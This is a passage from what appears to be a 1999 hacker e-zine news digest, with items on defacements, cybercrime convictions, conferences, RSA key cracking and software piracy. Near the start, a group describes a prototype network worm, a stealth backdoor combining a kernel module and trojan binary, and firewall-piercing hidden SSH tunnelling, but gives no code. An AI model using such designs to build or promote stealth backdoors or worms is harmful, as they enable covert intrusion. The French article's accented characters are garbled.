(Netherlands Antilles) km (Comoros) sc (Seychelles) gs (South Sandwich Islands) kn (Saint Kitts And Nevis) ly (Libyan Arab Jamahiriya) pn (Pitcairn) gd (Grenada) cm (Cameroon) tp (East Timor) mh (Marshall Islands) ws (Samoa) um (United States Minor Outlying Islands) tv (Tuvalu) sy (Syrian Arab Republic) re (Reunion) pw (Palau) mw (Malawi) mm (Myanmar) ml (Mali) lr (Liberia) cv (Cape Verde) cg (Congo, Republic) af (Afghanistan) [item 4] Lukemia One of our first research projects (circa 1997) involved researching possible designs of a modern network worm. We even developed a prototype in C which implements some of our ideas. Today, we're pretty horrified by our choice of language (In C, everything is equally difficult, "help save the world!" -- use Perl) and the quality of the code (butt ugly). [item 5] Portacelo "Local security subversion. Why human and (current) software (tripwire and others) host-based Intrusion Detection Systems are a bad idea." We did some research (right after the IAP was over) in this subject, and plan to release an article sometime in the near future. A fully-featured backdoor implementation is available, demonstrating the concept, which combines SSH ESP (suffix item 6), a kernel module, direct memory manipulation, and a good old fashioned binary trojan. [item 6] SSH ESP A hacked SSH suite modified to implement ESP (Encapsulated encrypted STREAMS Protocol) at the application level. Notable features include: piercing almost any current filter firewall. (ab-uses any available packet traffic: tcp, udp and icmp) invisible at the operating system level. (netstat and friends will not register any activity) practical. (ESP is almost as fast and reliable as TCP, including error correction) military strength encryption. (thanks to SSH) [iem 7] Note to the reader Christ, it took me, Liraz, over 2 weeks to write this silly article, during which I had to drop whatever I was doing, and devote the bulk of my time to writing this memorandum of the IAP in English, which is not my native language. (Disclaimer: Please excuse any errors in syntax, grammar or spelling. That felt good. Please forgive my bad writing, untasteful dramatics, poor sense of humor... I'll stop now...) In the process I had to convince my fellow project associates (some of them very strong willed) that documenting the IAP was A Good Thing, at least for posterity's sake... And all so I could offer you, dear reader, a chance to share some of my humble insights on computer security, and a taste of hacker culture. This is my first publication, I'm not too sure on how this is going to be accepted. Frankly, I prefer writing code, so I'm not sure I'll be writing any more articles soon. Whether or not that happens depends on the response I get from interested readers. If there is a good response, there will be more. But goddammit, they'll be shorter this time! I hope the article wasn't too technical for your tastes, but the project was mostly about overcoming technical and logistical difficulties, so that was hard to escape. Also, I am very short on time and resources, so if anyone is interested in sponsoring the material (an official SSR website for the rant and the software), that would be great. Oh, any takers on the IDDN front? We can start out with a (preferably archived) mailing list, find some interested people, get the ball rolling... All points of contact: liraz@bigfoot.com @HWA 32.0 TCS Web Page Defacer Pleads Guilty ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dioxin A 15-year old has pleaded guilty to defacing the web page of two Television Corporation of Singapore (TCS) web sites. The defacement occurred back in June. The infocrimminal will be sentenced soon for four counts of unauthorized entry and the disclosure of passwords. The individual made several guess at the login/password and eventually hit upon a combination that worked, "news/news". (And no sanctions against TCS for having weak/no security) The Strait Times http://straitstimes.asia1.com.sg/cyb/cyb1_0813.html HNN Archive for June 18 http://www.hackernews.com/arch.html?061899#4 (Strait Times article provided a 404) @HWA 33.0 Cybercrime On the Rise in Russia - First Offender Convicted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lionel The Russian Home Office has detected more than 100 IT related offenses since the beginning of the year. Russia has convicted its first computer related offender, an 18 year old student who stole $11,000 from a US company by selling its products over the Internet has been sentenced to 5 months in jail. S Yahoo - French http://www.yahoo.fr/actualite/19990812/multimedia/934457760-yaho140.120899.133648.html jeudi 12 aoűt 1999, 13h36 Prčs de 100 délits informatiques détectés en Russie en 7 mois MOSCOU, 12 aoűt (AFP)- Le ministčre russe de l'Intérieur a détecté prčs de 100 cas de fraude informatique depuis le début de l'année, a rapporté jeudi l'agence Itar-Tass. "La Russie a dű commencer ŕ résoudre ce problčme aprčs des effractions des systčmes informatiques ŕ l'étranger faites depuis la Russie", a commenté Vladislav Selivanov, chef du département de la lutte contre la fraude informatique, créé il y a un an. La fraude informatique sous toutes ses formes a augmenté ces derniers temps en Russie en raison de la crise économique, selon le directeur de la compagnie Aladdin qui produit des systčmes de défense pour les logiciels, Sergueď Grouzdev. "Les pertes que nous avons découvertes ces derniers temps représentent plusieurs centaines de dollars par jour, mais les chiffres réels sont beaucoup plus considérables", a-t-il estimé. La premičre condamnation en Russie d'un pirate informatique a eu lieu en novembre ŕ Moscou : un étudiant russe de 18 ans qui avait escroqué 11.000 dollars ŕ une société américaine vendant ses produits sur l'internet a été condamné ŕ 5 ans de prison avec sursis. neo/fd t @HWA 34.0 ToorCon Less Than One Month Away ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by skalore The first annual ToorCon is set to take place in less then one month, on September 3rd-4th, at the Price Center in The University of California, San Diego. ToorCon is San Diego's only comprehensive computer security conference, and will feature lectures that range from topics such as; IDS, Stack-based buffer overflows, secure remote communications, and more. ToorCon will also feature staff members from Attrition.org and ToorCon will reporters from the San Diego Union Tribune. And of course, after the day's lectures, San Diego's friendly neighbor to the south, Mexico, is available 24 hours, for partying and fun. HNN Cons page http://www.hackernews.com/cons/cons.html @HWA 35.0 FRESHMEAT.NET BOUGHT ~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Saturday 14th August 1999 on 9:51 pm CET It looks like Linux related sites are interesting for acquisition. After buying of Slashdot web site (www.slashdot.org), Andover.net bought well known FreshMeat (www.freshmeat.net). Plans for this site are the same as for Slashdot - Andover.net will earn money from selling advertising space. @HWA 36.0 LINUXPPC CRACK-CONTEST FINISHED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 8:20 pm CET The LinuxPPC crack-the-box contest has come to an early end, no-one has made a successful attempt yet, but some the organization of the contest decided to stop it for the following reasons: "Although it is interesting to have all of you try to break into the machine here, there are some problems that we found with that method. 1) Waste of bandwidth, 2) Waste of usefull machine that is supposed to go to AbiSource, 3) People are not following the rules anymore: Instead of breaking into our machine, they have started to piss of the ISP and other customers because they are trying to break into other machines. Please note,: This is an illegal activity and out of our hands. If you are doing this and continue to, the normal process of prosecuting such action will occur. 4) Because so many people are trying, interesting attacks are difficult to perform." @HWA 37.0 INFOSEEK HACKED ~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Saturday 14th August 1999 on 5:52 pm CET Today Infoseek (infoseek.go.com) was hacked. As Attrition collects defaced mirrors for archiving they noticed on this hack: "infoseek.go.com received an interesting hack of sorts. Attempting to search for anything would potentially yield a defaced page. The person reporting the hack to the Attrition staff received it after 5 searches. We tested it and received the defaced page on the first search attempt. This page stands out in comparison with their normal pages". Mirror of the defacement here:http://www.attrition.org/mirror/attrition/com/infoseek.go.com/Titles.html @HWA 38.0 HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 6:00 am CET FreeS/Wan is an open-source software package for Linux based servers that uses strong encryption to create secure data tunnels between any two points on the internet. It uses the IPsec protocol, an interoperable global standard for securing IP connections. The software generated strong interest among the 1,800 hackers who attended the Chaos Communication Camp, the Chaos Computer Club's first international hacker conference held outside Berlin last weekend. Here are some opinions on it. @HWA 39.0 TRINUX 0.62 RELEASED ~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 5:40 am CET Trinux is a portable Linux distribution that boots from 2-3 floppies (or a FAT 16 partition) and runs entirely in RAM. Trinux contains the latest versions of popular network security tools and is useful for mapping and monitoring TCP/IP networks. Trinux transforms an ordinary x86 PC into a powerful network (security) management workstation without modifying the underlying hardware or operating system. Get it. here: http://www.trinux.org @HWA 40.0 GOVERNMENT FACES SECURITY SKILLS SHORTAGE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 5:20 am CET The US federal government is facing a tremendous shortage of people needed to fight future cyberwars. Over the next seven years, the government will have to replace more than 32,000 information technology workers -- almost half of the 71,000 IT workers employed by federal agencies, according to a recent study by the federal Chief Information Officers Council. Of most concern is the need for IT employees with information security skills, according to a recent federal report urging the creation of a massive intrusion-detection system to protect federal and critical private systems, such as energy, telecommunications and transportation, against cyberattack. Computerworld. (Online News, 08/12/99 05:34 PM) Government faces security skills shortage By Patrick Thibodeau WASHINGTON -- Federal officials are looking at ways to prevent an "electronic Pearl Harbor" -- a sneak cyberattack. But in a situation somewhat parallel to the plight of the undermanned and unprepared military in 1941, the federal government is facing a tremendous shortage of people needed to fight any future cyberwar. Over the next seven years, the government will have to replace more than 32,000 information technology workers -- almost half of the 71,000 IT workers employed by federal agencies, according to a recent study by the federal Chief Information Officers Council. Much of the turnover is the result of rise in the number of employees eligible for retirement. Of most concern is the need for IT employees with information security skills, according to a recent federal report urging the creation of a massive intrusion-detection system to protect federal and critical private systems, such as energy, telecommunications and transportation, against cyberattack. The national cyber protection plan recommends funding information security programs at universities and offering scholarships to students in exchange for a commitment to work at federal agencies. Such programs may ultimately benefit private companies. Only a handful of universities now offer programs in information security. "Security hasn't made it into the mainstream of academe," said Lance J. Hoffman, a professor of computer science at George Washington University in Washington. So most IT students study to become programmers or Windows NT experts, while security specialist tend to get their training on the job, said Paul Jansen, manager of information security at loan guarantor and administration company USA Group Inc. in Indianapolis. When he hires, "I'm hiring other companies' security people," he said. If more universities offer security training, "I'm going to get people who have a better understanding of what our profession is all about," Jansen said. Throughout the industry, companies are having a tough time hiring IT workers with security skills. "I consider the need dire," said Richard Power, editorial director at the Computer Security Institute in San Francisco. Salary issues, in particular, make it hard for federal agencies to compete with the private sector. Government IT workers often start at salaries of less than $25,000, and the federal security plan recommends improving pay. There is "fierce competition" for IT workers with security skills, said Timothy Grance, manager of systems and network security at the National Institute of Standards and Technology. But a pay-for-performance salary program and the promise of working on research projects have been hiring incentives, he said. @HWA 41.0 SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 5:00 am CET A passage of the Copyright Amendment (Computer Programs) Bill 1999, a legislation passed yesterday, will allow software engineers to decompile computer software in limited circumstances to develop interoperable products. Read more below. Consumers and computer industry benefit from copyright changes Senator the Hon Richard Alston Minister for Communications, the Information Economy and the Arts The Hon Daryl Williams AM QC Attorney-General JOINT NEWS RELEASE 13 August 1999 Consumers will have greater choice in computer software and Australian-developed software will be more internationally competitive as a result of new legislation passed yesterday. The Attorney-General, the Hon Daryl Williams AM QC MP and Senator the Hon Richard Alston, Minister for Communications, Information Technology and the Arts announced today that passage of the Copyright Amendment (Computer Programs) Bill 1999 will allow software engineers to decompile computer software in limited circumstances so they can develop interoperable products. Currently software copyright owners can block this type of decompilation as an infringement of copyright. New laws mean developers will be able to decompile software to find this vital interface information if it is not readily available. Overseas developers have been able to do this for some time, particularly in Europe and the United States of America where Australia's main competitors in this sector are located. The amendments to the Copyright Act confirm that the Australian Government is committed to creating an environment that is conducive to increasing the competitiveness of Australian business and providing choice for consumers. The legislation also recognises that Australia's information industries underpin competitiveness of other industry sectors, particularly in the global economy. The legislation also makes changes to the Copyright Act important for the development of the information economy in Australia. The information age brings with it new threats to our safety and security - such as computer viruses and increasing incidence of unauthorised access to valuable information stored digitally. The legislation will help companies protect their valuable digital assets by providing another tool with which to deal with these threats. In recognition of the importance of resolving the year 2000 computer date (Y2K) problem, the legislation will operate retrospectively for error correction to the date of the announcement of the Government's decision, 23 February 1999. Decompilation of a program will be allowed without the copyright owner's permission for interoperability or security testing only if the information on the program's interfaces or on ensuring system security is not readily available. Information derived from decompilation of a program about its interfaces with other software or about errors in a defective copy, including Y2K problems, or which is required for testing system security cannot be used or communicated to others for any other purpose, without the copyright owner's permission. The severe penalties for copyright piracy will continue to apply. These penalties comprise up to $60,500 and / or five years in prison for each offence by an individual and up to $302,500 for each offence by a corporation. Media Contacts: Nicholas Harford Mr Williams' office (02) 6277 7300 Terry O'Connor Senator Alston's office (02) 6277 7480 @HWA 42.0 IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 4:50 am CET In a bid to bolster e-commerce security, the Irish government has introduced legislation that would criminalize the fraudulent use of e-signatures, subjecting violators to possible imprisonment and fines in excess of US$100,000. Under the extensive proposed legislation, e-signature documents and contracts will be afforded the same legal status as their paper counterparts. Info on 32bitsOnline. http://www.32bitsonline.com/news.php3?news=news/199908/nb199908135&page=1 Ireland Intends To Criminalize E-Signature Fraud By: David McGuire Date: 08/13/99 Location: WASHINGTON, DC, U.S.A., In a bid to bolster e-commerce security, the Irish government has introduced legislation that would criminalize the fraudulent use of e-signatures, subjecting violators to possible imprisonment and fines in excess of US$100,000. "The (European Union) is expected to come out with an e-signature directive and we've beat them (to it) with our own," Ken Thompson, spokesperson for the Irish embassy in Washington, DC, told Newsbytes today. Under the extensive proposed legislation, "e-signature documents and contracts will be afforded the same legal status as their paper counterparts," Thompson said. The ultimate goal of the legislation, which is expected to be passed into law before Christmas, is to heighten e-commerce security using the "lightest regulatory touch" possible, Thompson said. The legislation was proposed by Ireland's Department of Public Enterprise and should encounter no significant obstacles in becoming law, Thompson said. Under Irish parliamentary structure, bills that enjoy the support of the majority party are essentially assured of passage. Full text of the proposed legislation is located online at http://www.ecommercegov.ie/ . Earlier this month, the US House of Representatives' Committee on Commerce approved by unanimous voice vote the Electronic Signatures in Global and National (E-SIGN) Commerce Act, H.R. 1714. H.R. 1714 would legalize the use of digital signatures, making them as legally binding as a hand-signed John Hancock. The bill also establishes federal rules for digital signatures, replacing a patchwork of different state regulations. @HWA 43.0 ISRAEL AND PIRACY ~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Saturday 14th August 1999 on 4:00 am CET The whole of Israel shares the same disk goes the joke. But Israels almost getting placed on the Office of the United States Trade Representative's infamous Priority Foreign Country List for its alleged illegal activities is no laughing matter. According to the annual global report jointly prepared by the Software and Information Industries Association (SIIA) and the Business Software Alliance (BSA), 48 percent of software used in 1998 in Israel was illegal and this has to change. Wired. Piracy Rampant in Israel by By Tania Hershman 3:00 a.m. 13.Aug.99.PDT JERUSELEM -- When is a Microsoft Intellimouse not a Microsoft Intellimouse? When it's one of the several thousands of fake mice recently seized by police from an Israeli warehouse. The whole of Israel -- government included -- is sharing one disk, goes the joke. But for manufacturers big and small, Israelis' predilection for piracy, of software and music as well as hardware, is no laughing matter. Israel is dangerously close to being placed on the Office of the United States Trade Representative's infamous Priority Foreign Country List for its alleged illegal activities. New Justice Minister Yossi Beilin, visiting the United States this week, announced that he will be trying to appease the powers-that-be in order to avoid the next step -- sanctions. According to the annual global report jointly prepared by the Software and Information Industries Association (SIIA) and the Business Software Alliance (BSA), 48 percent of software used in 1998 in Israel was illegal, which represents lost revenues of US$63 million. While Israel does not top the list -- in Russia, for example, the figure is closer to 90 percent -- the United States is particularly upset with Israel because the government appears to be doing nothing. There may be a reason for this. "The government is one of the biggest of the software industry's customers, and they are using illegal software," says Ami Fleischer, Israel's representative to the BSA. "But when we say illegal software, this doesn't mean that there is a government official going down to the flea market," he added. The situation is euphemistically called 'under-licensing' or 'overworking,' meaning the number of licenses falls below the number of copies being used. On a wider scale, the Israeli public is not averse to "borrowing" software, believing that the chances of being caught are slim to none. "Bill Gates can afford it, right?" laughed one offender. Microsoft is not the only target: Other, smaller software houses with all their hopes riding on one product are being hit much harder. This culture of acceptable piracy may be rooted in the bootleg Hebrew music trade. At the central bus station in Tel Aviv, illegal cassettes and CDs of Israel's top artists are hawked openly. The damage done to this small local industry has been sufficient to warrant a national ad campaign featuring gagged Israeli singers. Israeli piracy is not limited to Israel's borders. Illegal copies are making their way abroad, too. "The figure of 48 percent doesn't show the whole picture. That doesn't get into the export issue. Forty-eight percent is a low estimate," said Keith Kupferschmidt, the SIIA's intellectual property counsel in Washington. Kupferschmidt has a word of advice for new prime minister Ehud Barak. "Whenever there is a high piracy rate there is a problem with people's understanding of what it is acceptable to do," he said. "If you have people in government whose job it is to crack down on piracy and the government devotes resources, we would see a different attitude." New legislation is in the works to modernize a copyright law dating back to 1911. According to Sandra Azancot, legal advisor on intellectual property law at Israel's Ministry of Justice, "The new legislation is a much more modern law, with a lot of clarification and strengthening." For example, the punishment for criminal offenses will now be five years instead of three. During his US visit this week, Justice Minister Beilin is talking up this legislation, as well as the new antipiracy police unit set up a few months ago. He will also be pointing to the fact that only three years ago 75 percent of software in Israel was illegal, over 50% higher than today. Yes, big organizations have smartened up their act, said the BSA's Ami Fleischer, but among small businesses with smaller pockets -- half of the Israeli business sector -- piracy is at the 80 percent mark. "People must understand that paying for software is part of the financial costs [of the company]," he stresses. With its thousands of high-tech start-ups Israel likes to think of itself as another Silicon Valley. But this won't last long if it allows potential technological and business allies to be ripped off. The Office of the US Trade Representative, which normally surveys the situation every April, is holding an extraordinary review in December of the Israeli government's progress. If it is not impressed, Israel will have six months to comply with certain conditions, says Fleischer, "and then the federal government will be obliged to impose sanctions." @HWA 44.0 OUTSIDE HELP ISN'T WANTED ~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Saturday 12th August 1999 on 3:58 pm CET Retired Cobol programmers will not be needed to help in building Y2K prepared systems. Vice president of communications at the Information Technology Association of America said: "We've seen many companies do much more work on this issue with internal staff than [was] originally thought earlier on". If you are wondering why Cobol programmers are important to solving Y2K bug go here. http://default.net-security.org/1/03.htm @HWA 45.0 HACKER MYTHOLOGY ~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Saturday 12th August 1999 on 3:51 pm CET ZDNet did a piece from this years' WebSec security conference. "The image of the hacker as a romantic, dangerous figure is pervasive, even in high-tech industries. Vendors promote such an image to sell security products. Hackers and wannabes promote it for the mystique". (Article not found - Ed) @HWA 46.0 DEFAULT ISSUE #1 ~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 13th August 1999 on 7:01 pm CET We are proud to announce that Default - Help Net Security newsletter is available to our readers. First issue covers: Last week's news on Help Net Security, Y2K: As the millennium approaches, A look into basic cryptography, The history of Zero Knowledge Systems, Telecommunications 101, Macintosh security: How to make your mac a babel tower, Computing: A closer look at hard- and software, An approach to Linux System Security, Infection & Vaccination, Spam: The problems with junk e-mail, Freedom of speech - related incidents, Meet the underground and a Guest column. So go to Default web-site (http://default.net-security.org) and start reading :) @HWA 47.0 MICROSOFT AND AOL ~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 13th August 1999 on 6:57 pm CET Microsoft employee impersonated a private technology consultant and sent an e-mail accusing AOL of irresponsible behavior in the battle over instant messaging. Microsoft officials didn't comment on it yet, but Richard Smith, security expert who received this e-mail said that Microsoft confirmed that the e-mail came from their employee. Contributed by ZaP. @HWA 48.0 INTERVIEW WITH ERIC RAYMOND ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 13th August 1999 on 6:45 pm CET ZDNet has published an interview with Eric Raymond, a programmer who supports open source movement which gave birth to the Linux operating system. He describes himself as "an anthropologist of the loosely knit community of developers who, on their own, have tinkered away at the increasingly popular alternative OS". Read the interview with Raymond (url not found) @HWA 49.0 CODE-CRACKING COMPUTER CAUSES CONCERN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 2:00 am CET Adi Shamir, one of the developers of the RSA encryption method, says he has designed a computer that could crack open a file encoded using RSA in only a few days. Needless to say, with RSA being one of the most widespread used encryption methods, such a computer could jeopardize the privacy of the bulk of electronic commerce as practiced today. Full story. Code-cracking computer causes concern WORCESTER, Mass. (AP) -- A developer of one of the most widespread computer encryption systems said Thursday he has designed a computer that could crack open a file encoded using the most common form of data encryption in only a few days. If built -- at an estimated cost of about $2 million -- such a computer could jeopardize the privacy of the bulk of electronic commerce as practiced today, according to cryptographers at the conference where the design was shown. Most highly sensitive military, banking and other data are protected by stronger encryption keys beyond its reach. The commonly used weaker keys, though, would become ''easy to break for large organizations,'' said cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot, Israel. He developed both the new computer design and helped invent the widespread coding system -- known as RSA public-key encryption -- that it cracks. Shamir spoke at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic Institute. Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key -- a sequence of 1s and 0s, or bits -- unlocks the secret coding of a computer transmission so it can be deciphered. Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine, and also refers to the twinkle of its light-emitting diodes. The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA encryption keys faster than ever -- within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and several months. Shamir first informally showed a prototype of his device at a conference in Prague, the Czech Republic, in May. He publicly outlined its workings at length for the first time Thursday. ''Twinkle is a little out there, but it looks like it's buildable to me,'' said Seth Goldstein, an expert in computer architecture at Pittsburgh's Carnegie Mellon University. Organized crime, friendly and unfriendly governments, research institutions and others might take an interest in such a project, conference participants suggested. In any event, users of 512-bit keys ''should be worried,'' said Christof Paar, a computer engineer at Worcester Polytechnic Institute. ''In the current state of the art, it is not secure,'' added Bob Silverman, a research scientist at Bedford, Mass.-based RSA Laboratories, a division of RSA Data Security, which Shamir co-founded but where he no longer works. Longer keys, such as 1,024-bit, are already employed for many sensitive communications. But, out of intelligence and other concerns, the U.S. government requires special permission to export software with the longer keys. The most popular browsers are normally set to just 512 bits. Brian Snow, a technical director for information security at the National Security Agency, spoke to the conference Thursday about weak quality assurance in commercial security products, but declined to answer press questions. Longer keys are harder to set up and take more computer power to operate. Such power may be scarce in the wireless telephones, home appliances and other computerized conveniences of the future, cryptographers said. @HWA 50.0 HACKING YOUR WAY TO AN IT CAREER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 1:30 am CET It's not a secret that talented hackers eventually often end up in IT-related jobs. David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco, presented hacker career workshops on the Chaos Computer Camp last weekend. Here are some of his tips. Interesting note: according to Del Torto, the talented programmers are preceded by their reputation in the small IT security community and that he won't hire or recommend people who don't act responsibly. It's all about the ethics eh? So what would you do?. (Online News, 08/12/99 05:34 PM) Hacking your way to an IT career By Ann Harrison ALTLANDSBERG, GERMANY -- At the first annual Chaos Communication Camp, which took place outside of Berlin last weekend (see story), hundreds of hackers and their machines filled the main hack tent exchanging information on the latest exploits and security tools. Most were young, skillful and in demand by corporate information technology departments. The camp, which attracted some of the most talented European and American hackers, was one of the largest hacker gatherings in Europe so far this year. David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco, agreed. He noted that hackers like himself were working at all the top five auditing and accounting firms. Del Torto presented hacker career workshops with titles such as "Take This Job and Ping It/Hacking The Corporate Ladder For Fun & Profit." The following are some of the tips he offered hackers seeking corporate jobs: - Write your own job description. - Volunteer for a project in your area of expertise. - Network with people. - Start your own company. - Or sign on to another start-up. He also advised the crowd to build tools they themselves would use ("You should be customer No. 1!"), license technology when appropriate and solve problems with free software or generate it. "When building reputation capital, it's pretty important to learn to think like the boss,'' he said. In addition to his day job, Del Torto is a member of the Cypherpunks, a San Francisco-based hacking organization that produces what he calls "no-compromise" security technology. Del Torto had advice for his Fortune 1000 brethren, too. Asked if young hackers, who may not be partial to suits and ties, are discriminated against, Del Torto recalled that Dan Farmer, author of the widely used Satan network scanning tool, was once turned down by a prospective employer who found his appearance unsettling. He urged IT managers to avoid superficial judgments and focus on the reputation of the individual. IT managers interviewing young people who "act differently" should remember when they were young, he advised. Del Torto noted that in the relatively small community of IT security professionals, people are preceded by their reputations. He said he knows programmers who are talented, but he won't hire or recommend them because they don't act responsibly. @HWA 51.0 BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 1:00 am CET Baltimore Technologies expects to ship an encryption and digital signature tool kit that will let users secure documents based on XML later this fall. The X/Secure tool kit will be able to encrypt XML and allow users to authenticate reciptients by digital signatures. Read more. Baltimore Technologies to ship encryption tool for XML docs By Ellen Messmer Network World Posted at 8:45 AM PT, Aug 12, 1999 Baltimore Technologies later this fall expects to ship an encryption and digital signature tool kit that will let users secure documents based on XML. The X/Secure tool kit will let customers encrypt XML documents or use digital signatures to authenticate the identity of the author of the XML content and the intended recipient. Digital signatures let customers check the content of a document to ensure it was not tampered with en route to the designated recipient. The X/Secure tool kit will be sold to meet two specific development needs, according to Sean Coughlin, Baltimore product manager. The first use would be as a Java-based utility to run on any Java Virtual Machine in order to automatically encrypt or sign XML-based documents and verify signed XML documents. Second, the tool kit would let customers add digital signing and encryption capabilities to XML-based applications. "We're basing the X/Secure tool kit on the IETF draft specification 'Digital Signatures for XML,' " Coughlin said. The World Wide Web Consortium is also considering this draft specification for inclusion in the suite of XML standards it shepherds, he added. Information about the specification is posted on both groups' Web sites. Baltimore has not yet set a price for the X/Secure tool kit, which may be sold in two versions when it ships by the end of the third quarter. Baltimore Technologies Inc., with headquarters in Dublin, Ireland, is at www.baltimoretechnologies.com. For more information about enterprise networking, go to Network World Fusion at www.nwfusion.com. Copyright (c) 1999 Network World Inc. All rights reserved. @HWA 52.0 STARTUP WANTS TO SELL UNTAPPABLE PHONES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 12:40 am CET Starium Inc plans to be selling telephone scrambling devices so powerful that even the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations. Needless to say, the US government isn't too thrilled about the idea. Wired. Starium Promises Phone Privacy by Declan McCullagh 3:00 a.m. 12.Aug.99.PDT MONTEREY, California -- The sleepy coastal town of Monterey, California, is not the kind of place where vision-fired entrepreneurs come to change the world. Monterey Bay is better known for sea lions than silicon, and for Cannery Row -- made famous half a century ago in John Steinbeck's gritty, eponymous novel. Today, the third floor of a converted sardine factory on Cannery Row is home to a startup company developing what could become a new world standard in privacy protection. By early 2000, Starium Inc. plans to begin selling sub-US$100 telephone scrambling devices so powerful that even the US government's most muscular supercomputers can't eavesdrop on wiretapped conversations. Such heavily armored privacy is currently available only to government and corporate customers who pony up about $3,000 for STU-III secure phones created by the US National Security Agency. By squeezing the same kind of ultra-strong encryption into a sleek brushed-steel case about twice the size of a Palm V -- and crafted by the same San Francisco designer -- Starium hopes to bring crypto to the masses. "Americans by nature don't like people reading over their shoulders," says Lee Caplin, president and CEO of Starium. True enough. But whether Americans will pay extra for privacy is open to question, especially since both people in a conversation need the Starium "handsets" to chat securely. And there's another big obstacle: The US government has repeatedly tried to keep similar products off the market unless they have a backdoor for surveillance. Its export rules prevent Starium from freely shipping its products overseas. Starium's three co-founders -- the company has since grown to eight people -- claim they're not fazed. "The technology is out there. Whether they like it or not, it exists," says Bernie Sardinha, Starium chief operations officer. "You cannot stop progress. You cannot stop technology." Starium at first planned to call its product CallGuard, but abandoned the name after discovering another company owned the trademark. The firm is considering VoiceSafe as another potential name. Customers will use the device by plugging it into their telephone handset -- a feature allowing it to work with office systems -- and plugging the handset into the base of the phone. At the touch of a "secure" button, the modems inside the two Starium units will form a link that, theoretically, creates an untappable communications channel. The units digitize, compress, filter, and encrypt voice communications -- and reverse the process on the other end. The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the initial setup, and a 168-bit triple DES algorithm for voice encoding. The four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a smart card port, and possibly serial, USB, and parallel interfaces, the company says. The final version will operate for over 2 hours on a pair of AA batteries. Starium's business plan is nothing if not ambitious. In addition to selling the portable units, the company wants to add crypto capabilities to cell phones, faxes, and even corporate networks. Target markets include the legal, medical, banking, and even political fields. "I've gotten a call from the George W. Bush people for use in the campaign," CEO Caplin says. The company says it's working on deals with major cell phone manufacturers like Ericsson and Nokia to offer the same voice-scrambling in software. Newer cell phones have enough memory and a fast enough processor to handle the encryption. Best of all, a software upgrade could be free. "You take your phone into a mall or a kiosk and they simply burn in the new flash ROM," Sardinha says. The idea for Starium came from longtime cypherpunk and company co-founder Eric Blossom, who was inspired by the Clinton administration's now-abandoned Clipper Chip plan to devise a way to talk privately. "I got interested around the time of Clipper. I was scratching my head saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett Packard and Clarity Software. Blossom created prototype devices and sold them online. But they were clunky -- about the size of a desktop modem. They were also expensive, and didn't sell very well. The company's directors include Robert Kohn, former chief counsel for PGP and Borland International, and Whitfield Diffie, distinguished engineer at Sun Microsystems and co-inventor of public key cryptography. @HWA 53.0 OUTSMARTING THE WILY COMPUTER VIRUS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by Thejian, Friday 13th August 1999 on 12:10 am CET CNN has yet another story on computer viruses. This one doesn't deal with any specific viruses however, but more with the precautions you can take. Mostly "make backups" and "update your AV-software" stuff you could think up yourself, but o what the hell :) Outsmart the wily computer virus August 11, 1999 Web posted at: 3:21 p.m. EDT (1921 GMT) by Carla Thornton (IDG) -- PROBLEM: Even if your PC runs an antivirus program, the risk of a data-destroying infection is real. SOLUTION: Take a few additional 